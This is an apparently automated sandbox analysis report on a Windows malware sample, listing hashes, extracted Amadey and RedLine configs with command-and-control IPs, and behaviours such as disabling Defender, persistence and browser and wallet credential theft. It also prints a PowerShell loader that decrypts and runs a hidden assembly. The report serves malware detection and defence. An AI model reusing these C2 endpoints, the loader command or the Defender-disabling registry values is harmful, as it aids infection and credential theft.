Analysis
-
max time kernel
124s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
26-01-2023 04:31
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
tmp.exe
Resource
win10v2004-20221111-en
General
-
Target
tmp.exe
-
Size
235KB
-
MD5
77e0a0a90e0231493bd421f4cdab0668
-
SHA1
b09f8951b42a2993b637df9e41f6a25be106c2cb
-
SHA256
75520c76a4051b2be15db8625f35d4c1c63d93686bf849e6fc67f4e62d2fd000
-
SHA512
d6a1c3ebe00c5d236dccab9fe867c8a87dea2a71cf54900cfe47cacf0c1d7a8e2dfbe91b466cad318144976fce340ba6f5e5da9a5c0cae71c1666ba09e6510e4
-
SSDEEP
6144:FSfSsOzqs7nAV3QN2tW0J3SluVy3VYygXqgkX:hbN6J4uVy3V3ga
Malware Config
Extracted
amadey
3.66
62.204.41.27/9djZdj09/index.php
62.204.41.88/9vdVVVjsw/index.php
Extracted
redline
fermo
62.204.41.159:4062
-
auth_value
6a3268170dff397208b77e34670d840e
Extracted
redline
temp777777777777
82.115.223.9:15486
-
auth_value
39fa6f6612a4320728bfb830f0e86553
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
redline
usainstall
45.15.157.0:22598
-
auth_value
38d8acbb300a0eb782f51350c8bcdc80
Extracted
redline
cheat
165.227.157.17:80
Signatures
-
Detect rhadamanthys stealer shellcode 4 IoCs
Processes:
resource yara_rule behavioral2/memory/3848-176-0x00000000005A0000-0x00000000005BD000-memory.dmp family_rhadamanthys behavioral2/memory/1104-263-0x0000000001050000-0x000000000106D000-memory.dmp family_rhadamanthys behavioral2/memory/1104-295-0x0000000001050000-0x000000000106D000-memory.dmp family_rhadamanthys behavioral2/memory/1644-297-0x0000000002040000-0x000000000205D000-memory.dmp family_rhadamanthys -
Processes:
desto1.exedesto.exeloda.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" desto1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" desto.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" desto1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" desto1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" desto1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" desto1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" desto.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" desto.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" loda.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" desto.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" desto.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" loda.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection desto1.exe -
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2228 2560 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000073001\buildee.exe family_redline behavioral2/memory/924-282-0x0000000000C10000-0x0000000000C2E000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000073001\buildee.exe family_redline -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
Processes:
OwvtknErB0Wl.exeXandETC.exeupdater.exedescription pid process target process PID 3336 created 2808 3336 OwvtknErB0Wl.exe taskhostw.exe PID 2284 created 1032 2284 XandETC.exe Explorer.EXE PID 2284 created 1032 2284 XandETC.exe Explorer.EXE PID 2284 created 1032 2284 XandETC.exe Explorer.EXE PID 2284 created 1032 2284 XandETC.exe Explorer.EXE PID 11128 created 1032 11128 updater.exe Explorer.EXE PID 11128 created 1032 11128 updater.exe Explorer.EXE PID 11128 created 1032 11128 updater.exe Explorer.EXE PID 11128 created 1032 11128 updater.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
nonetrollplease.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nonetrollplease.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 63 4624 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 26 IoCs
Processes:
nbveek.exeloda.exedesto1.exefermo1.exevarka1.exelove.exelove1.exefermo.exedesto.exelebro.exenbveek.exeOwvtknErB0Wl.exePlayer31.exenbveek.exenonetrollplease.exepb1111.execc.exeAcslq.exejn-17L.exebuildee.exerandom.exerandom.exeXandETC.exeAcslq.exenbveek.exeupdater.exepid process 408 nbveek.exe 2844 loda.exe 4948 desto1.exe 4172 fermo1.exe 1944 varka1.exe 3696 love.exe 3848 love1.exe 4556 fermo.exe 3624 desto.exe 1580 lebro.exe 4332 nbveek.exe 3336 OwvtknErB0Wl.exe 4800 Player31.exe 4580 nbveek.exe 1936 nonetrollplease.exe 4440 pb1111.exe 1644 cc.exe 4208 Acslq.exe 4188 jn-17L.exe 924 buildee.exe 2236 random.exe 4088 random.exe 2284 XandETC.exe 7096 Acslq.exe 7568 nbveek.exe 11128 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000069001\pb1111.exe vmprotect C:\Users\Admin\AppData\Local\Temp\1000069001\pb1111.exe vmprotect behavioral2/memory/4440-252-0x0000000140000000-0x000000014061F000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
nonetrollplease.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nonetrollplease.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nonetrollplease.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Acslq.exerandom.exetmp.exePlayer31.exenbveek.exenbveek.exejn-17L.exenbveek.exelebro.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation Acslq.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation tmp.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation Player31.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation jn-17L.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation lebro.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spykviya3dg.lnk powershell.exe -
Loads dropped DLL 10 IoCs
Processes:
OwvtknErB0Wl.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exepid process 3336 OwvtknErB0Wl.exe 316 rundll32.exe 1552 rundll32.exe 1620 rundll32.exe 528 rundll32.exe 3412 rundll32.exe 2152 rundll32.exe 1964 rundll32.exe 4900 rundll32.exe 4840 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
loda.exedesto1.exedesto.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" loda.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features desto1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" desto1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" desto.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
nbveek.exeAcslq.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fermo1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000051051\\fermo1.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\varka1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000052051\\varka1.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fermo.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000055051\\fermo.exe" nbveek.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fmqkuuswyi = "\"C:\\Users\\Admin\\AppData\\Roaming\\Vmjahlk\\Fmqkuuswyi.exe\"" Acslq.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
nonetrollplease.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nonetrollplease.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 28 api.ipify.org -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
love1.exefontview.exepid process 3848 love1.exe 3848 love1.exe 3848 love1.exe 1104 fontview.exe 1104 fontview.exe 1104 fontview.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
OwvtknErB0Wl.exenonetrollplease.exeAcslq.exedescription pid process target process PID 3336 set thread context of 212 3336 OwvtknErB0Wl.exe ngentask.exe PID 1936 set thread context of 4952 1936 nonetrollplease.exe AppLaunch.exe PID 4208 set thread context of 7096 4208 Acslq.exe Acslq.exe -
Drops file in Program Files directory 1 IoCs
Processes:
XandETC.exedescription ioc process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 8140 sc.exe 4152 sc.exe 14156 sc.exe 14204 sc.exe 4204 sc.exe 2356 sc.exe 1880 sc.exe 14128 sc.exe 14176 sc.exe 14228 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2200 4948 WerFault.exe desto1.exe 1116 1944 WerFault.exe varka1.exe 4064 3624 WerFault.exe desto.exe 1404 1644 WerFault.exe cc.exe 3528 3336 WerFault.exe OwvtknErB0Wl.exe 3064 3336 WerFault.exe OwvtknErB0Wl.exe 1744 316 WerFault.exe rundll32.exe 1544 1620 WerFault.exe rundll32.exe 4576 2152 WerFault.exe rundll32.exe 3964 4840 WerFault.exe rundll32.exe 4480 7096 WerFault.exe Acslq.exe -
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
love1.exefontview.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 love1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID love1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI love1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI love1.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID fontview.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fontview.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI love1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 fontview.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fontview.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fontview.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
ngentask.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ngentask.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ngentask.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1464 schtasks.exe 1620 schtasks.exe 1404 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry class 7 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\.uuw0jus4tz5\ = "cmwgfwxz1ui" powershell.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui\shell\open\command powershell.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui powershell.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui\shell powershell.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui\shell\open powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\cmwgfwxz1ui\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]43,40,34,231,152,221,253,185,62,148,240,241,99,206,96,33,14,60,169,236,234,238,30,154,71,251,34,196,130,93,105,193);$A.IV=@([byte]12,149,177,4,191,6,243,253,155,163,193,103,144,104,239,238);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\s1zq5lfytlz.uuw0jus4tz5'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[xF9MBhD11Uboko4.PbxDwsvP6fEK0qiF26sgtXEsvZYYfDOk56NDcpRwBQsm5JPMxpMT0PxTTSJxPvtdOqtePwvITy4GLpW8H]::SaDHVXEPeR09i1FG9E5Li7xIYPSH();\"" powershell.exe Key created \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000_Classes\.uuw0jus4tz5 powershell.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 49 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
loda.exedesto1.exefermo1.exeOwvtknErB0Wl.exelove.exedesto.exevarka1.exefermo.exengentask.exepowershell.exepid process 2844 loda.exe 2844 loda.exe 4948 desto1.exe 4948 desto1.exe 4172 fermo1.exe 4172 fermo1.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3696 love.exe 3696 love.exe 3624 desto.exe 3624 desto.exe 1944 varka1.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 3336 OwvtknErB0Wl.exe 4556 fermo.exe 212 ngentask.exe 212 ngentask.exe 4556 fermo.exe 1944 varka1.exe 4768 powershell.exe 4768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
loda.exedesto1.exevarka1.exefermo1.exelove1.exedesto.exelove.exefermo.exeAcslq.exepowershell.exebuildee.exefontview.exepowershell.exeAppLaunch.exeAcslq.exepowershell.exepowercfg.exepowershell.exesc.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2844 loda.exe Token: SeDebugPrivilege 4948 desto1.exe Token: SeDebugPrivilege 1944 varka1.exe Token: SeDebugPrivilege 4172 fermo1.exe Token: SeShutdownPrivilege 3848 love1.exe Token: SeCreatePagefilePrivilege 3848 love1.exe Token: SeDebugPrivilege 3624 desto.exe Token: SeDebugPrivilege 3696 love.exe Token: SeDebugPrivilege 4556 fermo.exe Token: SeDebugPrivilege 4208 Acslq.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 924 buildee.exe Token: SeShutdownPrivilege 1104 fontview.exe Token: SeCreatePagefilePrivilege 1104 fontview.exe Token: SeDebugPrivilege 4624 powershell.exe Token: SeDebugPrivilege 4952 AppLaunch.exe Token: SeDebugPrivilege 7096 